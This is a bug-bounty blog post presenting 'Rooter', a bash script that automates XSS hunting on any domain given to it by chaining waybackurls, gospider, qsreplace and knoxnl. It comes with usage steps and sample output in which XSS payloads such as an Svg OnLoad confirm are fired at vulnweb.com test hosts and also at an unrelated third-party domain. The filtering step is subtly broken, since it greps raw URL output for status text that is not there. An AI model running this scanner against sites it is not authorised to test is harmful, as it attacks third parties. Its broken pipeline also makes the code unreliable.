XSS Automation Finding with Rooter
I’m Shubham Tiwari, and I’ve been actively involved in bug bounty hunting for quite some time. In my journey, I’ve inspired myself to create an automation script that helps in finding XSS (Cross-Site Scripting) vulnerabilities. This blog post will guide you step-by-step on how to use the ‘Rooter’ script to automate the discovery of XSS vulnerabilities.
Introduction: XSS Automation Script (‘Rooter’)
#!/bin/bash
echo -e "\033[1;36m"
figlet -f slant "Rooter"
echo -e "\033[0m"
# Check if a domain was provided as an argument
if [ -z "$1" ]; then
echo "Usage: $0 <domain>"
exit 1
fi
# Set the domain
domain="$1"
# Get all URLs from the domain using waybackurls
waybackurls "$domain" > all-urls.txt
echo "Finding URLs."
# Spider the URLs using gospider
# --blacklist is used to exclude certain file types
# --other-source is used to include other sources of URLs
gospider -S all-urls.txt -c 10 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source >/dev/null
# Filter the URLs that returned a "200 OK" status code
# Extract the parameters from the URLs
# Replace the parameters with XSS payloads using qsreplace
# Save the results to a file named xss.txt
grep -e "code-200" all-urls.txt | awk '{print $5}' | grep "=" | qsreplace -a > xss.txt
echo "Finding vulnerable Endpoint."
# Test the XSS vulnerabilities using knoxnl
echo "Attack Start."
knoxnl -i xss.txt
# Clean up by removing the all-urls.txt file
rm all-urls.txt
How to Use:
https://github.com/shubham-rooter/Xss-automation/
- Start Using the Script: Paste the script into any text editor in your terminal and save it as
xss-automate.sh
. Then, in the terminal, make the script executable with the commandchmod +x xss-automate.sh
. - Find XSS URLs Using the Script: Run the script in the terminal with the command
./xss-automate.sh example.com
, whereexample.com
is the URL of your target domain. The script collects all URLs and then scans them using gospider. - Find Vulnerable Endpoints: To detect XSS vulnerabilities, the script uses
knoxnl
. You'll find vulnerable endpoints in the output. - Cleanup: After running the script, remove the
all-urls.txt
file, which is a temporary file containing URLs.
Example
┌──(rooter㉿rooter)-[~/Pictures/test]
└─$ ./xss-automate.sh vulnweb.com
_ _ __ __ _
| | ___ __ V_V\ \ / /_ __ | |
| |/ / '_ \ / _ \\ \/ /| '_ \| |
| <| | | | (_) / /\ \| | | | |
|_|\_\_| |_|\___/_/ \_\_| |_|_|
by @Xnl-h4ck3r
Current knoxnl version 3.4 (outdated)
Calling KNOXSS API for 85 targets...
[ ERR! ] - (GET) http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault.asp%3F KNOXSS ERR: target connection issues (timeout) [Unknown]
[ XSS! ] - (GET) http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=1")'<!--><Svg OnLoad=(confirm)(1)<!-- [9/5000]
[ ERR! ] - (GET) http://testphp.vulnweb.com/showimage.php?file=%27%22--%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%3CscRipt%3Ealert%280x002C88%29%3C%2FscRipt%3E&size=160
[ SAFE ] - (GET) http://testphp.vulnweb.com/?channel= [11/5000]
[ ERR! ] - (GET) http://ww25.tinnongmoingay.com/?subid1=20240409-0334-05db-8109-abf21292199c KNOXSS ERR: The target website timed out [11/5000]
[ ERR! ] - (GET) http://testhtml5.vulnweb.com/ajax/latest?offset= KNOXSS ERR: target connection issues (timeout) [11/5000]
[ ERR! ] - (GET) http://testphp.vulnweb.com/?page_id= KNOXSS ERR: The target website timed out [11/5000]
That’s a simple guide on using the ‘Rooter’ script to find XSS vulnerabilities. Now you’re ready to automate your bug bounty hunting journey even more!
Connect with Shubham via:
- Email: shubhamrooter@gmail.com
- LinkedIn: https://www.linkedin.com/in/shubham-tiwari09
- Twitter: https://twitter.com/shubhamtiwari_r
Happy bug hunting! 🐞✨